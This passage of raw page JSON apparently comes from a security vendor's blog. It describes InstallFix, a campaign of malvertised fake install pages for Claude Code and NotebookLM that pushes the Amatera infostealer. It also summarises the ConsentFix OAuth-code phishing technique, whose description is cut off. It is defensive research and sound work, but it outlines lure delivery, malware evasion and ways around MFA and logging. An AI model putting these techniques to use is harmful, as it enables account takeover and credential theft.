:28538,"content":28539,"nodeType":1036},{},[28540],{"data":28541,"marks":28542,"value":9942,"nodeType":883},{},[],{"data":28544,"content":28545,"nodeType":879},{},[28546],{"data":28547,"marks":28548,"value":9949,"nodeType":883},{},[],{"data":28550,"content":28551,"nodeType":1531},{},[28552,28561,28570],{"data":28553,"content":28554,"nodeType":1535},{},[28555],{"data":28556,"content":28557,"nodeType":879},{},[28558],{"data":28559,"marks":28560,"value":9962,"nodeType":883},{},[],{"data":28562,"content":28563,"nodeType":1535},{},[28564],{"data":28565,"content":28566,"nodeType":879},{},[28567],{"data":28568,"marks":28569,"value":9972,"nodeType":883},{},[],{"data":28571,"content":28572,"nodeType":1535},{},[28573],{"data":28574,"content":28575,"nodeType":879},{},[28576],{"data":28577,"marks":28578,"value":9982,"nodeType":883},{},[],{"data":28580,"content":28581,"nodeType":879},{},[28582],{"data":28583,"marks":28584,"value":9989,"nodeType":883},{},[],{"data":28586,"content":28587,"nodeType":879},{},[28588],{"data":28589,"marks":28590,"value":9997,"nodeType":883},{},[28591],{"type":916},{"data":28593,"content":28594,"nodeType":879},{},[28595],{"data":28596,"marks":28597,"value":10004,"nodeType":883},{},[],{"data":28599,"content":28602,"nodeType":971},{"target":28600},{"sys":28601},{"id":10009,"type":976,"linkType":977},[],{"data":28604,"content":28605,"nodeType":879},{},[28606],{"data":28607,"marks":28608,"value":10017,"nodeType":883},{},[],{"data":28610,"content":28613,"nodeType":971},{"target":28611},{"sys":28612},{"id":10022,"type":976,"linkType":977},[],{"data":28615,"content":28616,"nodeType":1036},{},[28617],{"data":28618,"marks":28619,"value":10030,"nodeType":883},{},[],{"data":28621,"content":28622,"nodeType":879},{},[28623,28626,28633],{"data":28624,"marks":28625,"value":10037,"nodeType":883},{},[],{"data":28627,"content":28628,"nodeType":940},{"uri":8582},[28629],{"data":28630,"marks":28631,"value":8587,"nodeType":883},{},[28632],{"type":948},{"data":28634,"marks":28635,"value":3386,"nodeType":883},{},[],{"data":28637,"content":28638,"nodeType":879},{},[28639],{"data":28640,"marks":28641,"value":10054,"nodeType":883},{},[],{"data":28643,"content":28644,"nodeType":905},{},[],{"data":28646,"content":28647,"nodeType":909},{},[28648],{"data":28649,"marks":28650,"value":10065,"nodeType":883},{},[28651],{"type":916},{"data":28653,"content":28654,"nodeType":879},{},[28655],{"data":28656,"marks":28657,"value":10072,"nodeType":883},{},[],{"data":28659,"content":28660,"nodeType":1531},{},[28661,28681,28701,28721],{"data":28662,"content":28663,"nodeType":1535},{},[28664],{"data":28665,"content":28666,"nodeType":879},{},[28667,28670,28678],{"data":28668,"marks":28669,"value":21,"nodeType":883},{},[],{"data":28671,"content":28672,"nodeType":940},{"uri":10087},[28673],{"data":28674,"marks":28675,"value":10094,"nodeType":883},{},[28676,28677],{"type":948},{"type":916},{"data":28679,"marks":28680,"value":10098,"nodeType":883},{},[],{"data":28682,"content":28683,"nodeType":1535},{},[28684],{"data":28685,"content":28686,"nodeType":879},{},[28687,28690,28698],{"data":28688,"marks":28689,"value":21,"nodeType":883},{},[],{"data":28691,"content":28692,"nodeType":940},{"uri":10110},[28693],{"data":28694,"marks":28695,"value":10117,"nodeType":883},{},[28696,28697],{"type":948},{"type":916},{"data":28699,"marks":28700,"value":10121,"nodeType":883},{},[],{"data":28702,"content":28703,"nodeType":1535},{},[28704],{"data":28705,"content":28706,"nodeType":879},{},[28707,28710,28718],{"data":28708,"marks":28709,"value":21,"nodeType":883},{},[],{"data":28711,"content":28712,"nodeType":940},{"uri":10133},[28713],{"data":28714,"marks":28715,"value":10140,"nodeType":883},{},[28716,28717],{"type":948},{"type":916},{"data":28719,"marks":28720,"value":10144,"nodeType":883},{},[],{"data":28722,"content":28723,"nodeType":1535},{},[28724],{"data":28725,"content":28726,"nodeType":879},{},[28727,28730,28738],{"data":28728,"marks":28729,"value":21,"nodeType":883},{},[],{"data":28731,"content":28732,"nodeType":940},{"uri":10156},[28733],{"data":28734,"marks":28735,"value":10163,"nodeType":883},{},[28736,28737],{"type":948},{"type":916},{"data":28739,"marks":28740,"value":10167,"nodeType":883},{},[],{"data":28742,"content":28743,"nodeType":879},{},[28744],{"data":28745,"marks":28746,"value":10174,"nodeType":883},{},[],{"data":28748,"content":28751,"nodeType":971},{"target":28749},{"sys":28750},{"id":10179,"type":976,"linkType":977},[],{"data":28753,"content":28754,"nodeType":905},{},[],{"data":28756,"content":28757,"nodeType":1036},{},[28758],{"data":28759,"marks":28760,"value":10191,"nodeType":883},{},[28761],{"type":916},{"data":28763,"content":28764,"nodeType":879},{},[28765],{"data":28766,"marks":28767,"value":10198,"nodeType":883},{},[],{"data":28769,"content":28770,"nodeType":879},{},[28771],{"data":28772,"marks":28773,"value":10205,"nodeType":883},{},[],{"data":28775,"content":28776,"nodeType":879},{},[28777],{"data":28778,"marks":28779,"value":10212,"nodeType":883},{},[],{"data":28781,"content":28782,"nodeType":879},{},[28783,28786,28793,28796,28803,28806,28813],{"data":28784,"marks":28785,"value":10219,"nodeType":883},{},[],{"data":28787,"content":28788,"nodeType":940},{"uri":10222},[28789],{"data":28790,"marks":28791,"value":10228,"nodeType":883},{},[28792],{"type":948},{"data":28794,"marks":28795,"value":2524,"nodeType":883},{},[],{"data":28797,"content":28798,"nodeType":940},{"uri":10234},[28799],{"data":28800,"marks":28801,"value":10240,"nodeType":883},{},[28802],{"type":948},{"data":28804,"marks":28805,"value":10244,"nodeType":883},{},[],{"data":28807,"content":28808,"nodeType":940},{"uri":4772},[28809],{"data":28810,"marks":28811,"value":1751,"nodeType":883},{},[28812],{"type":948},{"data":28814,"marks":28815,"value":1350,"nodeType":883},{},[],{"data":28817,"content":28818,"nodeType":905},{},[],{"data":28820,"content":28821,"nodeType":909},{},[28822],{"data":28823,"marks":28824,"value":10265,"nodeType":883},{},[28825],{"type":916},{"data":28827,"content":28828,"nodeType":879},{},[28829,28832,28839],{"data":28830,"marks":28831,"value":8703,"nodeType":883},{},[],{"data":28833,"content":28834,"nodeType":940},{"uri":8706},[28835],{"data":28836,"marks":28837,"value":8711,"nodeType":883},{},[28838],{"type":948},{"data":28840,"marks":28841,"value":8715,"nodeType":883},{},[],{"data":28843,"content":28844,"nodeType":879},{},[28845],{"data":28846,"marks":28847,"value":10288,"nodeType":883},{},[],{"data":28849,"content":28850,"nodeType":879},{},[28851],{"data":28852,"marks":28853,"value":10296,"nodeType":883},{},[28854],{"type":916},{"data":28856,"content":28857,"nodeType":1531},{},[28858,28867,28876,28885,28894,28903,28912,28921,28930,28939,28948,28957,28966,28975,28984,28993,29002,29011,29020,29029,29038],{"data":28859,"content":28860,"nodeType":1535},{},[28861],{"data":28862,"content":28863,"nodeType":879},{},[28864],{"data":28865,"marks":28866,"value":10309,"nodeType":883},{},[],{"data":28868,"content":28869,"nodeType":1535},{},[28870],{"data":28871,"content":28872,"nodeType":879},{},[28873],{"data":28874,"marks":28875,"value":10319,"nodeType":883},{},[],{"data":28877,"content":28878,"nodeType":1535},{},[28879],{"data":28880,"content":28881,"nodeType":879},{},[28882],{"data":28883,"marks":28884,"value":10329,"nodeType":883},{},[],{"data":28886,"content":28887,"nodeType":1535},{},[28888],{"data":28889,"content":28890,"nodeType":879},{},[28891],{"data":28892,"marks":28893,"value":10339,"nodeType":883},{},[],{"data":28895,"content":28896,"nodeType":1535},{},[28897],{"data":28898,"content":28899,"nodeType":879},{},[28900],{"data":28901,"marks":28902,"value":10349,"nodeType":883},{},[],{"data":28904,"content":28905,"nodeType":1535},{},[28906],{"data":28907,"content":28908,"nodeType":879},{},[28909],{"data":28910,"marks":28911,"value":10339,"nodeType":883},{},[],{"data":28913,"content":28914,"nodeType":1535},{},[28915],{"data":28916,"content":28917,"nodeType":879},{},[28918],{"data":28919,"marks":28920,"value":10368,"nodeType":883},{},[],{"data":28922,"content":28923,"nodeType":1535},{},[28924],{"data":28925,"content":28926,"nodeType":879},{},[28927],{"data":28928,"marks":28929,"value":10378,"nodeType":883},{},[],{"data":28931,"content":28932,"nodeType":1535},{},[28933],{"data":28934,"content":28935,"nodeType":879},{},[28936],{"data":28937,"marks":28938,"value":10319,"nodeType":883},{},[],{"data":28940,"content":28941,"nodeType":1535},{},[28942],{"data":28943,"content":28944,"nodeType":879},{},[28945],{"data":28946,"marks":28947,"value":10397,"nodeType":883},{},[],{"data":28949,"content":28950,"nodeType":1535},{},[28951],{"data":28952,"content":28953,"nodeType":879},{},[28954],{"data":28955,"marks":28956,"value":10407,"nodeType":883},{},[],{"data":28958,"content":28959,"nodeType":1535},{},[28960],{"data":28961,"content":28962,"nodeType":879},{},[28963],{"data":28964,"marks":28965,"value":10417,"nodeType":883},{},[],{"data":28967,"content":28968,"nodeType":1535},{},[28969],{"data":28970,"content":28971,"nodeType":879},{},[28972],{"data":28973,"marks":28974,"value":10427,"nodeType":883},{},[],{"data":28976,"content":28977,"nodeType":1535},{},[28978],{"data":28979,"content":28980,"nodeType":879},{},[28981],{"data":28982,"marks":28983,"value":10437,"nodeType":883},{},[],{"data":28985,"content":28986,"nodeType":1535},{},[28987],{"data":28988,"content":28989,"nodeType":879},{},[28990],{"data":28991,"marks":28992,"value":10447,"nodeType":883},{},[],{"data":28994,"content":28995,"nodeType":1535},{},[28996],{"data":28997,"content":28998,"nodeType":879},{},[28999],{"data":29000,"marks":29001,"value":10457,"nodeType":883},{},[],{"data":29003,"content":29004,"nodeType":1535},{},[29005],{"data":29006,"content":29007,"nodeType":879},{},[29008],{"data":29009,"marks":29010,"value":10378,"nodeType":883},{},[],{"data":29012,"content":29013,"nodeType":1535},{},[29014],{"data":29015,"content":29016,"nodeType":879},{},[29017],{"data":29018,"marks":29019,"value":10476,"nodeType":883},{},[],{"data":29021,"content":29022,"nodeType":1535},{},[29023],{"data":29024,"content":29025,"nodeType":879},{},[29026],{"data":29027,"marks":29028,"value":10486,"nodeType":883},{},[],{"data":29030,"content":29031,"nodeType":1535},{},[29032],{"data":29033,"content":29034,"nodeType":879},{},[29035],{"data":29036,"marks":29037,"value":10496,"nodeType":883},{},[],{"data":29039,"content":29040,"nodeType":1535},{},[29041],{"data":29042,"content":29043,"nodeType":879},{},[29044],{"data":29045,"marks":29046,"value":10506,"nodeType":883},{},[],{"data":29048,"content":29049,"nodeType":879},{},[29050],{"data":29051,"marks":29052,"value":10514,"nodeType":883},{},[29053],{"type":916},{"data":29055,"content":29056,"nodeType":1531},{},[29057,29066,29075],{"data":29058,"content":29059,"nodeType":1535},{},[29060],{"data":29061,"content":29062,"nodeType":879},{},[29063],{"data":29064,"marks":29065,"value":10527,"nodeType":883},{},[],{"data":29067,"content":29068,"nodeType":1535},{},[29069],{"data":29070,"content":29071,"nodeType":879},{},[29072],{"data":29073,"marks":29074,"value":10537,"nodeType":883},{},[],{"data":29076,"content":29077,"nodeType":1535},{},[29078],{"data":29079,"content":29080,"nodeType":879},{},[29081],{"data":29082,"marks":29083,"value":10547,"nodeType":883},{},[],{"data":29085,"content":29086,"nodeType":879},{},[29087],{"data":29088,"marks":29089,"value":10555,"nodeType":883},{},[29090],{"type":916},{"data":29092,"content":29093,"nodeType":879},{},[29094],{"data":29095,"marks":29096,"value":10564,"nodeType":883},{},[29097],{"type":10563},{"data":29099,"content":29100,"nodeType":879},{},[29101],{"data":29102,"marks":29103,"value":21,"nodeType":883},{},[],{"data":29105,"content":29106,"nodeType":879},{},[29107],{"data":29108,"marks":29109,"value":10578,"nodeType":883},{},[29110],{"type":10563},{"data":29112,"content":29113,"nodeType":879},{},[29114],{"data":29115,"marks":29116,"value":5957,"nodeType":883},{},[],{"data":29118,"content":29119,"nodeType":879},{},[29120],{"data":29121,"marks":29122,"value":10592,"nodeType":883},{},[29123],{"type":10563},{"data":29125,"content":29126,"nodeType":879},{},[29127,29130],{"data":29128,"marks":29129,"value":5957,"nodeType":883},{},[],{"data":29131,"marks":29132,"value":10603,"nodeType":883},{},[29133],{"type":916},{"data":29135,"content":29136,"nodeType":879},{},[29137],{"data":29138,"marks":29139,"value":10611,"nodeType":883},{},[29140],{"type":10563},{"data":29142,"content":29143,"nodeType":879},{},[29144],{"data":29145,"marks":29146,"value":21,"nodeType":883},{},[],{"data":29148,"content":29149,"nodeType":879},{},[29150],{"data":29151,"marks":29152,"value":10625,"nodeType":883},{},[29153],{"type":10563},{"data":29155,"content":29156,"nodeType":879},{},[29157,29160],{"data":29158,"marks":29159,"value":5957,"nodeType":883},{},[],{"data":29161,"marks":29162,"value":10636,"nodeType":883},{},[29163],{"type":916},{"data":29165,"content":29166,"nodeType":879},{},[29167],{"data":29168,"marks":29169,"value":10644,"nodeType":883},{},[29170],{"type":10563},{"data":29172,"content":29173,"nodeType":879},{},[29174],{"data":29175,"marks":29176,"value":10652,"nodeType":883},{},[29177],{"type":10563},{"data":29179,"content":29180,"nodeType":879},{},[29181],{"data":29182,"marks":29183,"value":10660,"nodeType":883},{},[29184],{"type":10563},{"data":29186,"content":29187,"nodeType":879},{},[29188],{"data":29189,"marks":29190,"value":10668,"nodeType":883},{},[29191],{"type":10563},{"data":29193,"content":29194,"nodeType":879},{},[29195],{"data":29196,"marks":29197,"value":10676,"nodeType":883},{},[29198],{"type":10563},{"data":29200,"content":29201,"nodeType":879},{},[29202],{"data":29203,"marks":29204,"value":10684,"nodeType":883},{},[29205],{"type":10563},{"data":29207,"content":29208,"nodeType":879},{},[29209,29212],{"data":29210,"marks":29211,"value":5957,"nodeType":883},{},[],{"data":29213,"marks":29214,"value":10695,"nodeType":883},{},[29215],{"type":916},{"data":29217,"content":29218,"nodeType":879},{},[29219],{"data":29220,"marks":29221,"value":10644,"nodeType":883},{},[29222],{"type":10563},{"data":29224,"content":29225,"nodeType":879},{},[29226],{"data":29227,"marks":29228,"value":10710,"nodeType":883},{},[29229],{"type":10563},{"entries":29231},{"hyperlink":29232,"inline":29233,"block":29234},[],[],[29235,29254,29288,29293,29299,29304,29309,29315,29323,29365,29368,29389,29431],{"sys":29236,"__typename":1785,"content":29237,"name":29253,"title":59},{"id":9717},{"json":29238},{"nodeType":875,"data":29239,"content":29240},{},[29241],{"nodeType":879,"data":29242,"content":29243},{},[29244,29249],{"nodeType":883,"value":29245,"marks":29246,"data":29248},"Update March 16:",[29247],{"type":916},{},{"nodeType":883,"value":29250,"marks":29251,"data":29252}," We've identified a number of additional InstallFix pages targeting both the Claude Code docs page (as opposed to the quickstart guide) and NotebookLM, a research and note taking tool from Google. New IoCs have been added accordingly, but this campaign is moving very quickly, so the list won't stay up to date for long. ",[],{},"installfix insight box 5",{"sys":29255,"__typename":1785,"content":29256,"name":29287,"title":59},{"id":9760},{"json":29257},{"data":29258,"content":29259,"nodeType":875},{},[29260,29280],{"data":29261,"content":29262,"nodeType":879},{},[29263,29267,29276],{"data":29264,"marks":29265,"value":29266,"nodeType":883},{},[],"Feeling *Fix fatigue? Us too. But we felt the naming appropriate to indicate that this is part of the same family of techniques. ClickFix has become synonymous with ",{"data":29268,"content":29270,"nodeType":940},{"uri":29269},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1204\u002F004\u002F",[29271],{"data":29272,"marks":29273,"value":29275,"nodeType":883},{},[29274],{"type":948},"Malicious Copy and Paste",{"data":29277,"marks":29278,"value":29279,"nodeType":883},{},[],", even though most lures haven’t been related to “fixing” anything for a while now. The user action is essentially the same, just the context of the lure is different. ",{"data":29281,"content":29282,"nodeType":879},{},[29283],{"data":29284,"marks":29285,"value":29286,"nodeType":883},{},[],"But while traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that. The pretext is simply the user wanting to install legit software.","installfix insight box 3",{"sys":29289,"__typename":6000,"title":29290,"arcadeDemoUrl":29291,"playText":29292},{"id":9833},"InstallFix clickthrough demo","https:\u002F\u002Fdemo.arcade.software\u002Fw9lLXrpwl5E19eQMEcPb?embed","20 secs",{"sys":29294,"__typename":1765,"title":29295,"caption":29295,"layoutMode":59,"file":29296},{"id":9839},"Comparison of the legit page and install commands versus a malicious clone",{"url":29297,"width":1781,"height":29298},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F27TYctONO1xi4dAh0lBeYS\u002F36d88361bbb6568410af6d95b829b4d8\u002Fimage4.png",588,{"sys":29300,"__typename":1765,"title":29301,"caption":29301,"layoutMode":59,"file":29302},{"id":9852},"When interacting with some of the detected pages, the user is redirected back to the legitimate site, lowering suspicion",{"url":29303,"width":21982,"height":21983},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F17m5qsbzkBXFHumXDG8Kur\u002F50d42f3c42092cba3082c4221a0857b0\u002Fimage1.gif",{"sys":29305,"__typename":1765,"title":29306,"caption":59,"layoutMode":59,"file":29307},{"id":9872},"Cloned page 1",{"url":29308,"width":1781,"height":8901},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3ymf2ZJNmWE0U09oOQktzj\u002F74984e9a094f01df4bcb661e23d58992\u002Fimage2.png",{"sys":29310,"__typename":1765,"title":29311,"caption":59,"layoutMode":59,"file":29312},{"id":9878},"Cloned page lure 2",{"url":29313,"width":1781,"height":29314},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FYbK5GVyftUS5G09jmdxSG\u002Fcc4c2cca40f873879d69371eab526b56\u002Fimage3.png",1107,{"sys":29316,"__typename":1765,"title":29317,"caption":29318,"layoutMode":59,"file":29319},{"id":9884},"Lure 3","Google Search sponsored results for Claude Code cloned pages",{"url":29320,"width":29321,"height":29322},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3sLwOnpET892xdFyvBtzfn\u002F956963620a9cec4bafd3b3a63f0426b0\u002Fimage5.png",1915,903,{"sys":29324,"__typename":1785,"content":29325,"name":29364,"title":59},{"id":9890},{"json":29326},{"nodeType":875,"data":29327,"content":29328},{},[29329],{"nodeType":879,"data":29330,"content":29331},{},[29332,29336,29344,29348,29355,29359],{"nodeType":883,"value":29333,"marks":29334,"data":29335},"Malvertising is an extremely prevalent distribution method ",[],{},{"nodeType":940,"data":29337,"content":29338},{"uri":8381},[29339],{"nodeType":883,"value":29340,"marks":29341,"data":29343},"we've seen used extensively",[29342],{"type":948},{},{"nodeType":883,"value":29345,"marks":29346,"data":29347}," to distribute both phishing payloads and ClickFix-style lures (including the ",[],{},{"nodeType":940,"data":29349,"content":29350},{"uri":1331},[29351],{"nodeType":883,"value":1321,"marks":29352,"data":29354},[29353],{"type":948},{},{"nodeType":883,"value":29356,"marks":29357,"data":29358}," campaign we uncovered last year). ",[],{},{"nodeType":883,"value":29360,"marks":29361,"data":29363},"In fact, 4 in 5 ClickFix lures we intercept are accessed from search engines.",[29362],{"type":916},{},"installfix insight box 1",{"sys":29366,"__typename":13297,"type":13298,"ctaText":29367,"buttonLabel":151,"buttonColour":13301,"buttonUrl":27},{"id":9934},"Read more about stealthy attack delivery and techniques in our new report, analysing the different browser-based techniques behind in-the-wild breaches in 2026.",{"sys":29369,"__typename":1785,"content":29370,"name":29388,"title":59},{"id":10009},{"json":29371},{"nodeType":875,"data":29372,"content":29373},{},[29374,29381],{"nodeType":879,"data":29375,"content":29376},{},[29377],{"nodeType":883,"value":29378,"marks":29379,"data":29380},"Amatera is a relatively new infostealer used by cybercriminals to steal sensitive data, such as browser saved passwords, cookies, session tokens, and general system information. It started appearing publicly around 2025 and is considered an evolution of an older malware family called ACR Stealer, and is sold via subscription to criminal operators.",[],{},{"nodeType":879,"data":29382,"content":29383},{},[29384],{"nodeType":883,"value":29385,"marks":29386,"data":29387},"The malware uses various techniques designed to bypass AV\u002FEDR, including direct NTSockets for C2, dynamic API resolution with WoW64 Syscalls, and multi-stage infection chains with dynamic payload delivery. Amatera communicates with its C2 server using hardcoded IP addresses belonging to legitimate CDNs, making the traffic difficult to block without disrupting legitimate services.",[],{},"installfix insight box 2",{"sys":29390,"__typename":1785,"content":29391,"name":29430,"title":59},{"id":10022},{"json":29392},{"nodeType":875,"data":29393,"content":29394},{},[29395],{"nodeType":879,"data":29396,"content":29397},{},[29398,29403,29407,29415,29418,29426],{"nodeType":883,"value":29399,"marks":29400,"data":29402},"Edit: ",[29401],{"type":916},{},{"nodeType":883,"value":29404,"marks":29405,"data":29406},"When investigating different domains, we found additional research that indicates a variety of similar payloads being distributed. Our primary focus here is on the scale of the campaign and the lure delivery technique rather than deep analysis of the malware itself. Check out ",[],{},{"nodeType":940,"data":29408,"content":29410},{"uri":29409},"https:\u002F\u002Fmedium.com\u002F@maurice.fielenbach\u002Fpaste-with-caution-how-a-fake-claude-code-installer-drops-a-fileless-implant-via-deserialization-a85068955c0a",[29411],{"nodeType":883,"value":29412,"marks":29413,"data":29414},"this detailed analysis for one such teardown",[],{},{"nodeType":883,"value":6198,"marks":29416,"data":29417},[],{},{"nodeType":940,"data":29419,"content":29421},{"uri":29420},"https:\u002F\u002Fwww.reddit.com\u002Fr\u002FCyberSecurityAdvice\u002Fcomments\u002F1riq3zj\u002Fi_accidentally_ran_a_suspicious_curl_command_in\u002F",[29422],{"nodeType":883,"value":29423,"marks":29424,"data":29425},"this Reddit thread",[],{},{"nodeType":883,"value":29427,"marks":29428,"data":29429}," for another example.",[],{},"installfix insight box 4",{"sys":29432,"__typename":6000,"title":29433,"arcadeDemoUrl":29434,"playText":26812},{"id":10179},"ClickFix attack evolution demo","https:\u002F\u002Fdemo.arcade.software\u002FUhbkGxUUQC8xpS5z88sx?embed",{"items":29436},[],{},"InstallFix: Weaponizing malvertised install guides  ",{"items":29440},[29441,30264,30857],{"__typename":1967,"sys":29442,"content":29444,"title":30250,"synopsis":30251,"hashTags":59,"publishedDate":30252,"slug":30253,"tagsCollection":30254,"authorsCollection":30260},{"id":29443},"4jcVFrvGBtVXpKU3gDMaa2",{"json":29445},{"data":29446,"content":29447,"nodeType":875},{},[29448,29466,29473,29479,29535,29542,29549,29552,29560,29567,29574,29628,29636,29643,29666,29673,29676,29684,29691,29698,29705,29712,29719,29726,29732,29740,29747,29766,29786,29789,29797,29804,29811,29818,29826,29845,29852,29858,29866,29886,29906,30019,30022,30030,30037,30044,30047,30055,30062,30069,30076,30143,30173,30176,30184,30191,30198,30205,30212,30238,30244],{"data":29449,"content":29450,"nodeType":879},{},[29451,29455,29462],{"data":29452,"marks":29453,"value":29454,"nodeType":883},{},[],"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ",{"data":29456,"content":29457,"nodeType":940},{"uri":1331},[29458],{"data":29459,"marks":29460,"value":1321,"nodeType":883},{},[29461],{"type":948},{"data":29463,"marks":29464,"value":29465,"nodeType":883},{},[],". This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. ",{"data":29467,"content":29468,"nodeType":879},{},[29469],{"data":29470,"marks":29471,"value":29472,"nodeType":883},{},[],"We saw this attack running across a large network of compromised websites that attackers were injecting the malicious payload into, forming a large-scale campaign that was detected across multiple customer estates. ",{"data":29474,"content":29478,"nodeType":971},{"target":29475},{"sys":29476},{"id":29477,"type":976,"linkType":977},"603MWDqc9NsqkklIkfGNZN",[],{"data":29480,"content":29481,"nodeType":879},{},[29482,29486,29495,29499,29507,29510,29519,29522,29531],{"data":29483,"marks":29484,"value":29485,"nodeType":883},{},[],"ConsentFix got a pretty awesome response from the community in a very short space of time. Within days, ",{"data":29487,"content":29489,"nodeType":940},{"uri":29488},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=AAiiIY-Soak",[29490],{"data":29491,"marks":29492,"value":29494,"nodeType":883},{},[29493],{"type":948},"John Hammond shared a new and improved version of the technique",{"data":29496,"marks":29497,"value":29498,"nodeType":883},{},[]," that he’d spun up in his own lab, while security researchers from ",{"data":29500,"content":29502,"nodeType":940},{"uri":29501},"https:\u002F\u002Fmedium.com\u002F@nitashathakur\u002Fconsentfix-poc-how-the-attack-works-end-to-end-4f8b656f977d",[29503],{"data":29504,"marks":29505,"value":13539,"nodeType":883},{},[29506],{"type":948},{"data":29508,"marks":29509,"value":2524,"nodeType":883},{},[],{"data":29511,"content":29513,"nodeType":940},{"uri":29512},"https:\u002F\u002Fwww.glueckkanja.com\u002Fen\u002Fposts\u002F2025-12-31-vulnerability-consentfix",[29514],{"data":29515,"marks":29516,"value":29518,"nodeType":883},{},[29517],{"type":948},"Glueck Kanja",{"data":29520,"marks":29521,"value":6198,"nodeType":883},{},[],{"data":29523,"content":29525,"nodeType":940},{"uri":29524},"https:\u002F\u002Fmsendpointmgr.com\u002F2026\u002F01\u002F08\u002Fconsentfix-quickfix\u002F",[29526],{"data":29527,"marks":29528,"value":29530,"nodeType":883},{},[29529],{"type":948},"other individual contributors",{"data":29532,"marks":29533,"value":29534,"nodeType":883},{},[]," all shared analysis and recommendations. ",{"data":29536,"content":29537,"nodeType":879},{},[29538],{"data":29539,"marks":29540,"value":29541,"nodeType":883},{},[],"In this blog, we’re sharing some new insights on the campaign, pulling together some of the top recommendations and resources shared across the community, and predicting what the future holds for this novel technique as it quickly enters the mainstream. ",{"data":29543,"content":29544,"nodeType":879},{},[29545],{"data":29546,"marks":29547,"value":29548,"nodeType":883},{},[],"First though, let’s quickly recap what ConsentFix is and how it works. ",{"data":29550,"content":29551,"nodeType":905},{},[],{"data":29553,"content":29554,"nodeType":909},{},[29555],{"data":29556,"marks":29557,"value":29559,"nodeType":883},{},[29558],{"type":916},"ConsentFix 101",{"data":29561,"content":29562,"nodeType":879},{},[29563],{"data":29564,"marks":29565,"value":29566,"nodeType":883},{},[],"ConsentFix is an attack technique that prompts the victim to share an OAuth authorization code with an attacker via a phishing page. The attacker then enters this code into a target application on their own device in order to complete the authorization handshake and take over the account. ",{"data":29568,"content":29569,"nodeType":879},{},[29570],{"data":29571,"marks":29572,"value":29573,"nodeType":883},{},[],"By hijacking OAuth, attackers can effectively bypass identity-layer controls like passwords and MFA — even phishing resistant authentication methods like passkeys have no impact on this attack, because it sidesteps the authentication process altogether. ",{"data":29575,"content":29576,"nodeType":879},{},[29577,29581,29590,29593,29600,29604,29613,29617,29625],{"data":29578,"marks":29579,"value":29580,"nodeType":883},{},[],"OAuth abuse attacks are not new. Techniques like ",{"data":29582,"content":29584,"nodeType":940},{"uri":29583},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fconsent_phishing\u002Fdescription.md",[29585],{"data":29586,"marks":29587,"value":29589,"nodeType":883},{},[29588],{"type":948},"consent phishing",{"data":29591,"marks":29592,"value":3983,"nodeType":883},{},[],{"data":29594,"content":29595,"nodeType":940},{"uri":13350},[29596],{"data":29597,"marks":29598,"value":2195,"nodeType":883},{},[29599],{"type":948},{"data":29601,"marks":29602,"value":29603,"nodeType":883},{},[]," have been around for some time. However, these mainly focus on connecting your primary workspace account (e.g. Microsoft, Google, etc.) to a fraudulent, attacker-controlled application. But this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",{"data":29605,"content":29607,"nodeType":940},{"uri":29606},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fmicrosoft-365\u002Fadmin\u002Fmisc\u002Fuser-consent?view=o365-worldwide",[29608],{"data":29609,"marks":29610,"value":29612,"nodeType":883},{},[29611],{"type":948},"stricter default configs",{"data":29614,"marks":29615,"value":29616,"nodeType":883},{},[],". That said, device code phishing still featured prominently in the recent ",{"data":29618,"content":29619,"nodeType":940},{"uri":7618},[29620],{"data":29621,"marks":29622,"value":29624,"nodeType":883},{},[29623],{"type":948},"high-profile Salesforce attacks in 2025",{"data":29626,"marks":29627,"value":1350,"nodeType":883},{},[],{"data":29629,"content":29630,"nodeType":1036},{},[29631],{"data":29632,"marks":29633,"value":29635,"nodeType":883},{},[29634],{"type":916},"What makes ConsentFix so dangerous?",{"data":29637,"content":29638,"nodeType":879},{},[29639],{"data":29640,"marks":29641,"value":29642,"nodeType":883},{},[],"Unlike typical OAuth attacks, the novel ConsentFix approach enabled the attacker to target different types of application to what they usually go after — with big implications for detection and response. In this case, the attacker:",{"data":29644,"content":29645,"nodeType":1531},{},[29646,29656],{"data":29647,"content":29648,"nodeType":1535},{},[29649],{"data":29650,"content":29651,"nodeType":879},{},[29652],{"data":29653,"marks":29654,"value":29655,"nodeType":883},{},[],"Specifically targeted first-party Microsoft apps that cannot be restricted in the same way as third-party applications, and are pre-consented in every tenant (meaning users can authenticate to them without admin approval). ",{"data":29657,"content":29658,"nodeType":1535},{},[29659],{"data":29660,"content":29661,"nodeType":879},{},[29662],{"data":29663,"marks":29664,"value":29665,"nodeType":883},{},[],"Leveraged legacy scopes that are outside the scope of default logging to evade detection, and targeted scopes with known Conditional Access policy exclusions.",{"data":29667,"content":29668,"nodeType":879},{},[29669],{"data":29670,"marks":29671,"value":29672,"nodeType":883},{},[],"This means that default controls you’d expect to block malicious OAuth grants don’t apply, you may not have logging enabled to detect it if it did happen to you, and to top it off, conditional access policy exclusions mean that many organizations’ expected controls don’t work as intended in this case. ",{"data":29674,"content":29675,"nodeType":905},{},[],{"data":29677,"content":29678,"nodeType":909},{},[29679],{"data":29680,"marks":29681,"value":29683,"nodeType":883},{},[29682],{"type":916},"ConsentFix campaign recap",{"data":29685,"content":29686,"nodeType":879},{},[29687],{"data":29688,"marks":29689,"value":29690,"nodeType":883},{},[],"Let’s quickly recap how the ConsentFix campaign was implemented. ",{"data":29692,"content":29693,"nodeType":879},{},[29694],{"data":29695,"marks":29696,"value":29697,"nodeType":883},{},[],"The victim is served a page which requires that they verify that they are human by pasting a URL into the phishing page.",{"data":29699,"content":29700,"nodeType":879},{},[29701],{"data":29702,"marks":29703,"value":29704,"nodeType":883},{},[],"Clicking the “Sign In” button opens a legitimate Microsoft login page. If the user is 